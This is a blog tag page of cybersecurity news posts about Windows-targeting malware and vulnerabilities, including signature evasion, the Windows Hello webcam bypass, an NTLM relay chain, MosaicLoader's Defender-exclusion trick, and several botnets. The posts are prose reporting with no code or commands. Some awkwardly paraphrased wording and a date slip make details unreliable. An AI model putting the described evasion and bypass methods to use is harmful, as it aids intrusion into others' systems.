Search This Blog

Showing posts with label Windows. Show all posts

Hackers Discover Technique to Make Malware Undetectable on Windows

 

Investigators within the cybersecurity industry have revealed a unique approach used by a threat actor to purposefully avoid detection using flawed digital signatures of their malware payloads. 

In a written report on Thursday, Google Threat Analysis Group's Neel Mehta claimed attackers produced flawed code signatures that seem to be valid by Windows and are not capable of somehow be decoded or controlled by OpenSSL code. 

A notorious family of undesirable software, called OpenSUpdater, used it to download and install other suspected programming on affected computers, was found to be exploiting the new technique. Users in the U. S., most likely to download pirated game versions and other gray-area software, were among the campaign or cyber attack targets. 

However, these conclusions are made from samples of OpenSUpdater that have been uploaded to VirusTotal since at least mid-August. 

Whilst still opponents are dependent on unlawfully procured digital certificates in previous malware and undesired software, or even have embedded attack code in digitally signed software components by trying to poison the supply chain, OpenS Updater continues to stand out because it uses deformed signatures deliberately to slip through the defense. Whereas the attack code has been entered into the digitally signed software. 

"This is the first time TAG has observed actors using this technique to evade detection while preserving a valid digital signature on PE files," Mehta said. 

"Code signatures on Windows executables provide guarantees about the integrity of a signed executable, as well as information about the identity of the signer. Attackers who can obscure their identity in signatures without affecting the integrity of the signature can avoid detection longer and extend the lifetime of their code-signing certificates to infect more systems." 

The artifacts are authenticated/signed with an invalid leaf X.509 certificate – modified in such a way so as contain an End-Of-Content (EOC) marker rather than a NULL tag in the 'parameters' feature of the Signature Algorithm fields. Despite products that use OpenSSL to get signature data are denied as invalid, tests on Windows PCs could enable the file to be executed without any notice of security.

New Malware Variant Employs Windows Subsystem for Linux for Attacks

 

Security experts have found a new malware variant that uses Windows Subsystem for Linux to infect systems covertly. The research highlights that malicious actors explore new attack tactics and focus on WSL to avoid being detected. 

Black Lotus Labs, the Lumen Technologies networking threat research organization, reported on Thursday 16th of September claimed that it has detected many malicious Python files in Debian Linux's binary ELF (Executable and Linkable) format. 

The initial samples were found at the beginning of May for the WSL environment and lasted until August 22 every 2 to 3 weeks. These function as WSL loaders and can be detected extremely poorly in public file scanning services. The next step is the injection of malWindows API calls into an ongoing process, a method that is neither new nor advanced. 

Of the few discovered instances, only one has been given a publicly routable IP address, indicating that attackers concerned are testing WSL for malware installation on Windows. The malevolent files mostly rely on Python 3 to perform their duties and are bundled with PyInstaller as ELF for Debian. 

“As the negligible detection rate on VirusTotal suggests, most endpoint agents designed for Windows systems don’t have signatures built to analyze ELF files, though they frequently detect non-WSL agents with similar functionality” Black Lotus Labs told. 

Just over a month ago, only one VirusTotal antivirus engine recognized a dangerous Linux file. Updating the scan for another sample demonstrated that the motors on the scanning service were not fully detected. 

One of the alternatives, written in Python 3 entirely, doesn't even use Windows APIs and is the first WSL loader effort. It is functional with both Windows and Linux with normal python libraries. 

In April 2016, Microsoft released the Windows Subsystem for Linux. When WSL was newly released from beta in September, investigators from Check Point revealed a catastrophe termed Bashware, where WSL could be misused to hide malicious code from security products. 

The scientists theorize that the code is still being created, even in the final level, depending on the incoherences detected in the analysis of multiple samples. The limited public IP exposure suggests activities in Ecuador and France at the end of June and the beginning of July, which are restricted to targets. 

Further, Black Lotus Labs recommends that everyone who has WSL enabled, make sure that logging is activated to detect these intrusions.

Linux Implementation of Cobalt Strike Beacon Employed by Hackers in Attacks Worldwide

 

Security experts have detected an unauthorized version of the Cobalt Strike Beacon Linux created by malicious attackers that are actively utilized to attack organizations worldwide. Cobalt Strike is a legal penetration testing tool built for the red-team attacking infrastructure (security organizations that function as attackers to detect the security and flaws in the infrastructure of their org). 

Cobalt Strike is often utilized for post-exploitation duties by malicious attackers (often dropped in ransomware campaigns) following the planting of so-called beacons that give permanent remote access to affected machines. Employing beacons, attackers may access compromised servers for the collection of data or distribute additional payloads of malware afterward. 

Over time, the cybercriminals acquired split copies of the Cobalt Strike and circulated this as one of the most prevalent instruments of cybersecurity threats culminating in theft and extortion of information. Cobalt Strike, however, has always had a problem - it enables only Windows devices and therefore does not contain Linux beacons. 

Further, as per a new analysis by the security company Intezer, scientists describe exactly how the threat actors have chosen to construct their cobalt strike-compatible Linux beacons. Malicious actors may now maintain and execute remote control over both Windows and Linux devices by utilizing these beacons. 

The undiscovered variant — dubbed "Vermilion Strike" — of the penetration testing program is one of the uncommon Linux ports, typically a Windows-based red team instrument which is heavily used by opponents to launch a range of specific attacks. As a threat simulation software, Cobalt Strike claims to be Beacon's payload designed to simulate a sophisticated actor and to double their post-exploitation behaviors. 

"The stealthy sample uses Cobalt Strike's command-and-control (C2) protocol when communicating to the C2 server and has remote access capabilities such as uploading files, running shell commands, and writing to files," Intezer researchers said in a report. 

Once installed, the malware starts the operation in the background, decoding the required configuration for the beacon to operate effectively just before the fingerprint identification of the Linux-compromised device and communicating to a remote server via DNS or HTTP to recover base64 encoded and AES-encrypted commands, to write files and upload them back to the webserver. 

"Vermilion Strike and other Linux threats remain a constant threat. The predominance of Linux servers in the cloud and its continued rise invites APTs to modify their toolsets to navigate the existing environment," the researchers said.

PRIVATELOG Relies on Common Log File System to Evade Detection

 

Researchers have revealed data about a new malware family that uses the Common Log File System (CLFS) to conceal a second-stage payload in registry transaction files in order to avoid detection. The malware, named PRIVATELOG, and its installer, STASHLOG, were discovered by FireEye's Mandiant Advanced Practices team. Details about the threat actor's identity and motivations are still unknown. 

CLFS (Common Log File System) is a general-purpose logging subsystem for producing high-performance transaction logs that is available to both kernel-mode and user-mode applications. It debuted with Windows Server 2003 R2 and has since been incorporated into subsequent Windows operating systems. CLFS can be used for event logging as well as data logging. TxF and TxR employ CLFS to save transactional state changes before committing a transaction. Any integrated Windows utility will not be able to examine the Binary Log File(s) created by CLFS. 

CLFS's goal, like that of any other transactional logging system, is to record a series of steps required for a particular activity so that they can be accurately replayed in the future to commit the transaction to secondary storage or undone if necessary.

Despite the fact that the malware has yet to be found in real-world attacks aimed at consumer environments or seen launching any second-stage payloads, Mandiant believes PRIVATELOG is still in development, might be the work of a researcher, or could be used in a highly targeted attack. 

“Because the file format is not widely used or documented, there are no available tools that can parse CLFS log files. This provides attackers with an opportunity to hide their data as log records in a convenient way, because these are accessible through API functions. This is similar in nature to malware which may rely, for example, on the Windows Registry or NTFS Extended Attributes to hide their data, which also provide locations to store and retrieve binary data with the Windows API.” explained Mandiant researchers.

PRIVATELOG and STASHLOG have features that allow malicious software to remain undetected on infected machines, such as the use of obfuscated strings and control flow techniques that are specifically designed to make static analysis difficult. 

Mandiant researchers examined a PRIVATELOG sample that is an un-obfuscated 64-bit DLL named prntvpt.dll that contains exports that are similar to those found in legal prntvpt.dll files. By hijacking the search order used to load DLLs, PRIVATELOG expects to be loaded from PrintConfig.dll. YARA rules are provided by Mandiant to detect PRIVATELOG and STASHLOG malware, as well as it's variations.

Hackers are Selling Tool to Hide Malware in GPUs

 

Cybercriminals are moving towards malware attacks that can execute code from a hacked system's graphics processing unit (GPU). Although the approach is not new, and demo code has been published in the past, most of the projects to date have come from academics or were unfinished and unpolished. 

Recently in August, the proof-of-concept (PoC) was sold on a hacker forum, perhaps signaling hackers' shift to a new level of complexity in their attacks. 

Code Tested on Intel, AMD, and Nvidia GPUs

In a brief post on a hacking forum, someone offered to sell the proof-of-concept (PoC) for a strategy that keeps harmful code protected from security solutions scanning the system RAM. The seller gave a brief description of their technique, claiming that it stores malicious code in the GPU memory buffer and then executes it from there. 

As per the advertiser, the project only works on Windows PCs that support OpenCL 2.0 and above for executing code on various processors, including GPUs. It also stated that he tested the code on Intel (UHD 620/630), Radeon (RX 5700), and GeForce (GTX 740M(? ), GTX 1650) graphics cards. 

However, there are fewer details regarding this new hack, but the post went live on August 8 and was apparently sold for an unknown amount on August 25.

Another hacker forum user mentioned that GPU-based malware had been done before, citing JellyFish, a six-year proof-of-concept for a Linux-based GPU rootkit. 

The vendor dismissed the links to the JellyFish malware, stating that their approach is unique and does not rely on code mapping to userspace. There is no information regarding the transaction, such as who purchased it or how much they paid. Only the seller's article claims to have sold the malware to an unidentified third party. 

Academic Study

Researchers at the VX-Underground threat repository stated in a tweet on Sunday that the malicious code allows binary execution by the GPU in its memory region. They also noted that the technique will be demonstrated soon. 

PoCs for a GPU-based keylogger and a GPU-based remote access trojan for Windows were also disclosed by the same researchers that created the JellyFish rootkit. All three projects were released in May 2015 and are open to the public. 

While the mention of the JellyFish project implies that GPU-based malware is a new idea, the foundation for this attack approach was developed around eight years ago. 

Researchers from the Institute of Computer Science - Foundation for Research and Technology (FORTH) in Greece and Columbia University in New York demonstrated in 2013 that GPUs can execute a keylogger and save recorded keystrokes in their memory space [PDF document here]. 

The researchers previously evidenced that malware authors may use the GPU's processing capabilities to pack code with extremely sophisticated encryption methods considerably faster than the CPU.

ShadowPad Malware is Being Sold Privately to Chinese Espionage

 

Since 2017, five separate Chinese threat groups have used ShadowPad, an infamous Windows backdoor that allows attackers to download additional harmful modules or steal data. In a detailed overview of the malware, SentinelOne researchers Yi-Jhen Hsieh and Joey Chen said that "adoption of ShadowPad significantly reduces the costs of development and maintenance for threat actors," adding that "some threat groups stopped developing their own backdoors after they gained access to ShadowPad." 

ShadowPad was released in 2015 as a replacement for PlugX. However, it wasn't until several well-known supply-chain incidents – CCleaner, NetSarang, and ShadowHammer – that it began to gain considerable public attention. Unlike the publicly available PlugX, ShadowPad is only available to a selected group of people. ShadowPad has been called a "masterpiece of privately sold malware in Chinese espionage" by an American cybersecurity firm. 

ShadowPad is a shellcode-based modular backdoor. A layer of an obfuscated shellcode loader is in charge of decrypting and loading a Root plugin during execution. While the Root plugin's chain of operations decrypts, it loads other shellcode-embedded plugins into memory. To date, at least 22 different plugins have been discovered. 

Additional plugins can be remotely uploaded from the C&C server in addition to the ones included, allowing users to dynamically add functionality that isn't present by default. A Delphi-based controller is in charge of the infected machines, which is used for backdoor communications, upgrading the C2 infrastructure, and controlling the plugins.

"While ShadowPad is well-designed and highly likely to be produced by an experienced malware developer, both its functionalities and its anti-forensics capabilities are under active development," the researchers said. 

ShadowPad-related attacks have lately targeted Hong Kong-based firms as well as key infrastructure in India, Pakistan, and other Central Asian countries. The implant is known to be shared by multiple Chinese espionage actors, including Tick, RedEcho, RedFoxtrot, and clusters dubbed Operation Redbonus, Redkanku, and Fishmonger, although being predominantly attributed to APT41. 

"The threat actor behind Fishmonger is now using it and another backdoor called Spyder as their primary backdoors for long-term monitoring, while they distribute other first-stage backdoors for initial infections including FunnySwitch, BIOPASS RAT, and Cobalt Strike," the researchers said. "The victims include universities, governments, media sector companies, technology companies and health organizations conducting COVID-19 research in Hong Kong, Taiwan, India and the U.S."

BHUSA: Windows Hello Passwordless Bypass Disclosed

 

Passwords are usually a vulnerable spot in security, which is why alternatives like Microsoft Hello, which gives a passwordless approach to authentication, are gaining popularity. While Windows Hello promises to provide a more protected experience than conventional passwords, it's a method that might have been circumvented. 

Speaking at the Black Hat USA on August 5, Omer Tsarfati, a security researcher from CyberArk, described a comprehensive attack chain that he used to circumvent Windows Hello. The problems of using regular passwords, according to Tsarfati, are well understood. They are frequently weak and readily crackable, are vulnerable to phishing attempts, and many users reuse passwords across different sites. 

The central point behind passwordless is that instead of using a password, another kind of authentication technology is used to log on to a system. Biometrics, such as fingerprint scanning or face recognition, can be used in passwordless methods. 

Windows Hello is Microsoft's version of a passwordless approach, which launched in Windows 10. Users may utilize face recognition to get access to a system, among other things, with Windows Hello. 

Tsarfati determined that he would need a separate camera to figure out how to get around Windows Hello's face recognition. To that purpose, he purchased an NXP evaluation board, which can connect to a Windows PC through USB and give camera capability. 

Tsarfati's objective was to have the USB device replicate what a genuine Windows system camera would offer to Windows Hello in order to discover what the system is actually processing as it decides whether or not to grant access. 

He found that Windows Hello requires cameras to have an infrared (IR) sensor. In order for Windows Hello to work, the camera must be capable to transmit both a color image and IR frames. 

"Windows Hello doesn't really pay attention to anything that you're sending in the color frames. It's only relying on the infrared, I sent frames of SpongeBob and it worked," Tsarfati stated. 

An attacker would just need a customized USB device that imitates a camera to bypass Windows Hello. That USB gadget would then have to be capable of transmitting an infrared picture, which could be acquired from a victim. 

Tsarfati did not go into considerable detail about how a probable attacker would proceed about capturing an IR image from a victim, but he did show with his own IR image how the Windows Hello bypass works. 

The vulnerability was officially recognized as CVE-2021-34466, which Microsoft patched in July after Tsarfati and CyberArk responsibly revealed it to Microsoft in March of this year.

Fake Windows 11 Installers are Being Used to Spread Malware

 

Although Windows 11 isn't expected to be released until later this year, hackers have already begun attempting to use it to infect victims with malware. On Friday, security firm Kaspersky warned that crooks were using bogus installers to take advantage of consumers eager to get their hands on the Microsoft operating system update, which is set to be released in the fall. 

“Although Microsoft has made the process of downloading and installing Windows 11 from its official website fairly straightforward, many still visit other sources to download the software, which often contains unadvertised goodies from cybercriminals (and isn’t necessarily Windows 11 at all),” Kaspersky wrote. The sarcastic "goodies" include anything from harmless adware to password stealers and trojans. 

An executable file called 86307 windows 11 build 21996.1 x64 + activator.exe is one example. It certainly appears credible, with a file size of 1.75GB. However, the majority of that space is taken up by a single DLL file that contains a lot of irrelevant data. 

When you run the application, the installer seems to be a standard Windows installation wizard. Its primary function is to download and execute a more intriguing executable. The second executable is likewise an installer, with a license agreement that describes it as a “download manager for 86307 windows 11 build 21996.1 x64 + activator” and notes that it will also install some sponsored applications. If you accept the agreement, your computer will be infected with a number of malicious programmes. 

It's not uncommon for hackers to take advantage of victims' demand for a product or service, whether it's coronavirus contact tracing apps or the Telegram encrypted messaging app. In late June, Microsoft announced Windows 11 and made an initial “insider preview” accessible. Security has been highlighted as a key driving factor in the development of the operating system upgrade. 

The bogus installers are proliferating as Microsoft battles a number of security threats directed at the firm. Last week, Microsoft revealed instructions on how to protect against the "PetitPotam" attack, which might allow attackers to take control of Windows domains, as well as a solution for the "SeriousSAM" vulnerability, which could let attackers get administrative access. Last week, the corporation also issued a warning about LemonDuck, a cryptocurrency mining malware that has been targeting Microsoft devices. 

LemonDuck Targets Windows and Linux Systems

 

Initially, it was mainly a crypto-monetary botnet that allowed machine mining but later a transformation was initiated to make it a malware loader, bringing us to Microsoft's current update on this malevolent digital duck loaded with citrus. 

Microsoft warns users that LemonDuck's crypto-mining malware is aimed at both Windows and Linux, and distributes itself by phishing, exploiting, USB, and brute-force operations and attacks that exploit a serious vulnerability on the Exchange Server detected in March. 

In May, two years after the first bug appeared, the organization was found to be employing Exchange bugs for cryptocurrencies mining. 

Notably, throughout the period where security teams concentrate on correcting severe faults, and even eradicating competing spyware, the group behind LemonDuck makes use of high-profile weaknesses to protect the security system. 

The repercussions may be grave if one is attacked by the LemonDuck. Thus according to Microsoft, LemonDuck's capabilities include the robbing of key Windows and Linux PC credentials as well as the removal of security controls that make the system defenseless; email spreading (probably spearphishing attempts); and the reinstallation in devices to facilitate further execution of remote code (RCE) through back doors. 

Malware research teams from Cisco's Talos have indeed scoped the group's exchange activity. They observed that before loading payloads such as the Cobalt strike pentesting kit, a popular lateral movement tool, LemonDuck was utilizing automated tools to scan, detect, and exploit server software, which allows the malware to download additional modules. 

Microsoft post on the matter says, “(LemonDuck) uses a wide range of spreading mechanisms—phishing emails, exploits, USB devices, brute force, among others — and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using Covid-19-themed lures in email attacks. In 2021, it exploited newly patched Exchange Server vulnerabilities to gain access to outdated systems." 

It is also revealed by Microsoft that although the attackers have initially predominantly focused on China, India is now in the top ten countries most afflicted by this malware. Precisely, India is among the six top countries targeted by cybercriminals alongside the USA, Russia, China, Germany, and Great Britain, with production and IoT businesses being the main targets. 

The risk is also heightened by the expanding malware architecture, which makes the cybersecurity sector even more vulnerable to these attacks. 

The usage of LemonCat, a distinct yet equally harmful and highly developed focused malware tool often used to install backdoors in systems through RCE attacks, is also mentioned by Microsoft. 

Further, Microsoft’s threat intelligence team states, “The threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks."

This New Malware Hides Itself Among Windows Defender Exclusions to Avoid Detection

 

On Tuesday, security experts confirmed the existence of a previously undocumented malware strain named "MosaicLoader," which targets people looking for cracked software as part of a global campaign. 

Bitdefender researchers stated in a report shared with The Hacker News, "The attackers behind MosaicLoader created a piece of malware that can deliver any payload on the system, making it potentially profitable as a delivery service." 

"The malware arrives on target systems by posing as cracked installers. It downloads a malware sprayer that obtains a list of URLs from the C2 server and downloads the payloads from the received links." 

The malware's name comes from its complex internal structure, which is designed to avoid reverse engineering and escape investigation. MosaicLoader attacks employ a well-known malware delivery technique known as search engine optimization (SEO) poisoning, in which hackers buy ad slots in search engine results to elevate their harmful URLs to the top of the results when users search for keywords linked to pirated software. 

Following a successful infection, the Delphi-based dropper which masquerades as a software installer and serves as an entry point for retrieving next-stage payloads from a remote server and adding local exclusions in Windows Defender for the two downloaded executables in an effort to circumvent antivirus scanning. 

It's important to note that such Windows Defender exclusions can be found in the registry keys listed below: 

1.File and folder exclusions - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths 

2.File type exclusions - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions 

3.Process exclusions - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes 

One of the binaries, "appsetup.exe," is designed to attain system persistence, while the second, "prun.exe," is a downloader for a sprayer module that can obtain and deploy a range of attacks from a list of URLs, ranging from cookie stealers to cryptocurrency miners, and even more advanced implants like Glupteba. 

Because of MosaicLoader's broad capabilities, compromised systems can be co-opted into a botnet, which the threat actor can then use to spread a variety of malicious software, including both publicly available and customized malware, to gain, expand, and manage unauthorized access to victim computers and networks. 

The researchers added, "The best way to defend against MosaicLoader is to avoid downloading cracked software from any source."

Besides being against the law, cybercriminals look to target and exploit users searching for illegal software, adding it's essential to check the source domain of every download to make sure that the files are legitimate.

By Fooling a Webcam, Hackers were Able to get Past Windows Hello

 

Biometric authentication is a critical component of the IT industry's plan to eliminate the need for passwords. However, a new method for fooling Microsoft's Windows Hello facial recognition technology demonstrates that a little hardware tinkering can make the system unlock when it shouldn't.

Face-recognition authentication has become more prevalent in recent years thanks to services like Apple's FaceID, with Windows Hello driving usage even further. Face recognition by Hello is compatible with a variety of third-party webcams. 

Only webcams having an infrared sensor in addition to the conventional RGB sensor operate with Windows Hello facial recognition. However, it turns out that the system doesn't even look at RGB data. The researchers discovered that by using a single straight-on infrared image of a target's face and a black frame, they were able to open the victim's Windows Hello–protected device. The researchers were able to fool Windows Hello into thinking the device owner's face was there and unlocking by manipulating a USB webcam to produce an attacker-chosen image. 

“We tried to find the weakest point in the facial recognition and what would be the most interesting from the attacker’s perspective, the most approachable option,” says Omer Tsarfati, a researcher at the security firm CyberArk. “We created a full map of the Windows Hello facial-recognition flow and saw that the most convenient for an attacker would be to pretend to be the camera because the whole system is relying on this input.”

Microsoft dubbed the discovery a "Windows Hello security feature bypass vulnerability" and patched the problem on Tuesday. Furthermore, the company recommends that users use "Windows Hello enhanced sign-in security," which employs Microsoft's "virtualization-based security" to encrypt Windows Hello facial data and process it in a secure area of memory. 

Tsarfati, who will present the findings at the Black Hat security conference in Las Vegas next month, says the CyberArk team focused on Windows Hello's facial-recognition authentication because there has already been a lot of research into PIN cracking and fingerprint-sensor spoofing in the industry. 

He goes on to say that the team was attracted by a large number of Windows Hello users. Microsoft said in May 2020 that the service had over 150 million users. In December, Microsoft announced that 84.7 percent of Windows 10 users utilize Windows Hello to log in.

Cybercriminals Unleashing Malware for Apple M1 Chip

 

Apple Macs are becoming more popular in the workplace, and the number of malware variants targeting macOS is increasing as well. However, the M1, Apple's new system-on-a-chip, has produced a new generation of macOS-specific malware that anti-malware tools, threat hunters, and researchers must swiftly learn to recognize and, eventually, fight. Historically, most macOS malware has been reused from Windows malware variants. But when employees built up home offices as a result of the pandemic's shift to work-from-home, more Macs entered the industry, making them a more valuable target for attackers targeting enterprises. 

Apple's new ARM64-based microprocessor, the M1, has already witnessed an increase in malware types created expressly for it, according to Mac security specialist Patrick Wardle. "As attackers evolve and change their ways, we as malware analysts and security researchers need to stay abreast of that as well.” In 2020, around half of all macOS malware, such as adware and nation-state attack code, may have migrated from Windows or Linux. 

M1 offers faster and more efficient processing, graphics, and battery life, and is now available in Apple's new Macs and iPad Pro. It also has several new built-in security mechanisms, such as one that protects the computer from remote exploitation and another that protects physical access. 

According to a recent Malwarebytes survey, Windows malware detections are down 24% among business users, while Mac malware detections are up 31%. Wardle discovered in his research that when he separated the binaries for macOS malware into two categories, one for Intel-based Macs and the other for M1-based Macs, anti-malware systems detected the Intel-based malware more successfully than the M1-based malware, despite the fact that the binaries are "logically the same." 

For the M1 malware, their detection rate dropped by 10%. That's a clue, he says, that existing antivirus signatures are mostly for the Intel edition of the macOS malware, rather than the M1 variant. Because static analysis alone can fail, detections should also use behavior-based technology. 

It's a matter of honing malware analysts' and threat hunters' skills to the new Apple silicon, he says. With reverse-engineering abilities and an awareness of the ARM64 instruction set, he says he wants to "empower Mac analysts, red teams, and everyone in cybersecurity." Wardle says, "The M1 system actually does significantly improve security at the hardware level, but it's transparent to the everyday user."

POC Exploit Posted Online Leaks Dangerous Microsoft Bug Info

 

A POC (Proof of Concept) exploit was posted online this Tuesday for Windows Print Spooler service vulnerability that can allow an attacker to fully compromise Windows systems. Known as CVE-2021-1675, Microsoft patched the vulnerability earlier this month in June 2021 patch security updates. 

The Record says "however, in what looks to have been an accident, an in-depth technical write-up and a fully working PoC exploit were shared on GitHub earlier today. The GitHub report has been taken offline after a few hours, but not before it was cloned by several other users." 

The vulnerability affects Print Spooler (spoolsv.exe), a windows feature which works as a generic universal interface between the apps, local or networked printers, and Windows OS that lets app developers print jobs easily. Windows has been providing this service since the 90s, but it is one of the most buggy processes of the operating system, with many bugs being found throughout the years, "such as PrintDemon, FaxHell, Evil Printer, CVE-2020-1337, and even some of the zero-days used in the Stuxnet attacks," the Record says. 

The latest bug "CVE-2021-1675" is in the long queue of Print Spooler Bugs, and was first found by researchers at Tencent Security, NSFOCUS, and AFINE earlier this year. 

"Last week, Chinese security firm QiAnXin published a low-quality GIF showing an exploit for the CVE-2021-1675 bug for the first time, but the company did not release any technical details or a working PoC in order to allow users more time to apply this month’s security updates and safeguard their systems," reports the Record. 

Bug Allows Remote Code Execution The vulnerability was first marked as the low-importance elevation-of-privilege vulnerability which lets an attacker to get admin access, however, last week, Microsoft changed the vulnerability's status to mark CVE-2021-1675 as a remote code execution problem that could be remotely exploited to let hackers to fully compromise unlatched Windows devices. 

At first, no POC or technical write-up was posted as CVE-2021-1675, which means that hackers who want to exploit this vulnerability had to inspect the patch code themselves and create an exploit to integrate this bug into their cyberattacks.

DirtyMoe Botnet has Infected over 100,000 Windows Systems

 

More than 100,000 Windows systems have been infected with the DirtyMoe malware. According to cyber-security firm Avast, a Windows malware botnet thought to be managed out of China has surged this year, increasing from 10,000 infected systems in 2020 to more than 100,000 in the first half of 2021. The malware, which goes by the names DirtyMoe, PurpleFox, Perkiler, and NuggetPhantom, has been circulating since late 2017. 

Its main goal has been to infect Windows systems and mine cryptocurrency behind the users' backs, although the functionality to execute DDoS assaults was discovered in 2018. The botnet was a small-scale operation for the majority of its existence. Its authors mostly used email spam to get people to malicious websites that hosted the PurpleFox exploit kit. 

This web-based attack tool took use of browser vulnerabilities, most commonly in Internet Explorer, to install a rootkit component on unpatched Windows computers, giving the malware complete control over the affected host, which is then used for crypto-mining. This rootkit, also known as DirtyMoe, PurpleFox, Perkiler, and NuggetPhantom, was well-known in the cyber-security field, but it was only considered a minor threat. 

According to Avast, the DirtyMoe botnet had an annual average of a few hundred to a few thousand infected systems for the majority of its life from 2017 to 2020. Things changed dramatically near the end of 2021 when the DirtyMoe gang released an update to their operation that included a worm module that allowed the malware to spread across the internet to other Windows systems. “Recently, a new infection vector that cracks Windows machines through SMB password brute force is on the rise” reads the analysis published by Avast. This module scoured the internet for distant Windows machines that had left their SMB port exposed online and launched password brute-force attacks against them. 

The malware's SMB propagation module allowed it to explode in terms of infections on a logarithmic scale, with over 100,000 systems affected this year alone, according to Avast. However, this figure is based solely on Avast's visibility—that is, PCs with the antivirus software installed. The true magnitude of the DirtyMoe botnet is thought to be far larger. 

A report from Tencent, a Chinese security firm, detected an increase in DirtyMoe/PurpleFox infections in China over the course of 2021, reflecting the comparable explosion in infection numbers reported by Avast in Europe, Asia, and America at the start of the month.

Hackers Take Advantage of Adobe Zero-Day Vulnerability Impacting Acrobat Reader

 

A patch for Adobe Acrobat, the world's most popular PDF reader, addresses a vulnerability that has been actively exploited and affects both Windows and macOS systems, allowing for arbitrary code execution. 

Adobe is advising customers about a crucial zero-day vulnerability in its widely used Adobe Acrobat PDF reader software that is being actively exploited in the wild. As part of Adobe's Tuesday roundup of 43 fixes for 12 of its products, including Adobe Creative Cloud Desktop Application, Illustrator, InDesign, and Magento, a patch is now available. 

According to Adobe, the CVE-2021-28550 zero-day vulnerability "has been exploited in the wild in selective attacks targeting Adobe Reader users on Windows. Adobe Reader users on Windows may be the only ones that are currently being targeted. The bug, however, affects eight different versions of the software, including those for Windows and Mac. The versions include:

1.Windows Acrobat DC & Reader DC (versions 2021.001.20150 and earlier) 
2.macOS Acrobat DC & Reader DC (versions 2021.001.20149 and earlier) 
3.Windows & macOS Acrobat 2020 & Acrobat Reader 2020 (2020.001.30020 and earlier versions)
4.Windows & macOS Acrobat 2017 & Acrobat Reader 2017 (2017.011.30194  and earlier versions)

Adobe did not have any technical details about the zero-day flaw. Those details are usually available after users have had a chance to apply the patch. Users can manually update their product installations by going to Help > Check for Updates, according to Adobe's May security bulletin, which was released on Tuesday. 

Several other important bugs were included in Tuesday's roundup of 43 fixes. Adobe Acrobat received a total of ten crucial and four significant vulnerability patches. A total of seven of the bugs were arbitrary code execution bugs. Three of the vulnerabilities patched on Tuesday (CVE-2021-21044, CVE-2021-21038, and CVE-2021-21086) expose systems to out-of-bounds write attacks. 

On Tuesday, Adobe Illustrator got the highest number of patches, with five critical code execution vulnerabilities patched. Three of the flaws (CVE-2021-21103, CVE-2021-21104, and CVE-2021-21105), according to Adobe's definition, are memory corruption bugs that enable hackers to execute arbitrary code on targeted systems. The three memory corruption bugs were discovered by Kushal Arvind Shah, a bug-hunter with Fortinet's FortiGuard Labs.

Threat Actors Use Several New Advanced Techniques To Exploit Windows Services


 

According to the cybersecurity researchers, several fresh techniques, comparatively advanced — are being used by attackers, for exploiting legitimate Windows services to accelerate low-level privileges into the system (concept and practice of restricting access rights for users, accounts, and computing processes to only those resources required to perform routine, legitimate activities, least privilege is also a foundational component of zero trust strategies) to get full control of the system. 

By the means of this recent attack, the threat actors took the same advantages, targeting similar Windows services facilities as that of previous attacks. Meanwhile, threat actors are also working on some new techniques to get access to the recent version of the operating system, as reported by Antonio Cocomazzi, a system engineer at SentinelOne. Furthermore, Antonio Cocomazzi shed light on the same in a Black Hat Asian virtual conference this week. 

For the organizations, the biggest issue dealing with these cyberattacks is that these attacks exploit services that hold a very important part of the system as well as exist by design in the windows functioning system. These services are enabled and available by default into the system as well as they play an essential part in the implementation of Web networking, mail servers, database servers, and other important services. 

Exploits, named “juicy potatoes,” has become a mainstream method for threat actors to invade into the windows systems, said Cocoazzi. Further, he added that SentinelOne has disclosed some very specific evidence against this exploit: it is being used in multiple APT campaigns. 

“Microsoft has fixed the exploit in newer versions of its software. However, JuicyPotato still works on every updated Windows Server until version 2016 and on every updated Windows Client machine until version 10, build 1803. Additionally, newer versions of the so-called Potato family of exploits — such as RoguePotato and Juicy 2 — are now available that bypass the Microsoft fix that shut down JuicyPotato.” Antonio Cocomazzi, a system engineer at SentinelOne reported. 

NTLM Relay Attack Exploits Windows RPC Flaws

 

Security researchers at SentinelLabs revealed the details of a newly identified NTLM (New Technology LAN Manager) relay attack that exploits a remote procedure call (RPC) flaw to enable elevation of privilege.

This new vulnerability in RPC, which apparently impacts all versions of Windows, enables an attacker to escalate privileges from User to Domain Admin, all without requiring interaction from the user (NTLM relay attacks typically do require user intervention). 

The researchers used a DCOM client that was instructed to connect to an RPC server, operation that involved two NTLM authentications, one without the sign flag being set, and also leveraged the fact that the DCOM activation service can be abused to trigger RPC authentication. 

According to SentinelLabs, the motive behind the attack was that a shell in Session 0, even as a low privileged user, combined with triggering some CLSIDs, could allow the attacker to obtain “an NTLM authentication from the user who is interactively connected.”

Methodology used by cybercriminals 

Threat actors have a shell in Session 0 on the target machine, even with a low privileges account, user with high privileges (such as Domain Admin) logs in interactively, then the attacker triggers the DCOM activation service to impersonate the high-privileged user and then implements a man-in-the-middle to receive an authenticated call, the binding of the RPC under the attacker’s control takes place and then the victim machine makes an authenticated call, authentication is relayed to a privileged resource such as LDAP, SMB, HTTP or other, lastly the authentication is forwarded for privilege escalation.

Researchers at SentinelLabs also published proof-of-concept code to demonstrate how the exploit works, and revealed that, although Microsoft has acknowledged the vulnerability, a patch won’t be released. The researchers, however, did publish a series of mitigations that should help prevent attacks that would trigger an authenticated RPC/DCOM call and then relay the NTLM authentication. 

“This is different from other known techniques such as CVE-2020-1113 and CVE-2021-1678, where relaying happens between a generic ‘client’ protocol vs. an RPC server. In this case, we had an RPC client whose authentication was relayed to other ‘server’ protocols and without ‘victim’ interaction. Therefore, we hope that MS reconsider their decision not to fix this serious vulnerability,” SentinelLabs concludes.

New REvil Ransomware Version Automatically Logs Windows into Safe Mode

 

The REvil Ransomware is unstoppable when it comes to ingenious hacking tactics and techniques. The well-known ransomware has escalated its attack vector once again, this time by changing the victim's login password in order to reboot the computer into Windows Safe Mode. 

While malicious groups are constantly upgrading their attack strategies in order to fight security measures, the threat actors behind the REvil ransomware are especially skilled at honing their malware in order to make their attack campaigns more effective.

